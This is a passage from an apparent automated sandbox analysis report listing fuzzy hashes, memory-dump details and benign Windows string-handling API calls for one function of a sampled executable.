• Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
• Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
• CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
• lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
Memory Dump Source
• Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
• Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
• Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
• Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69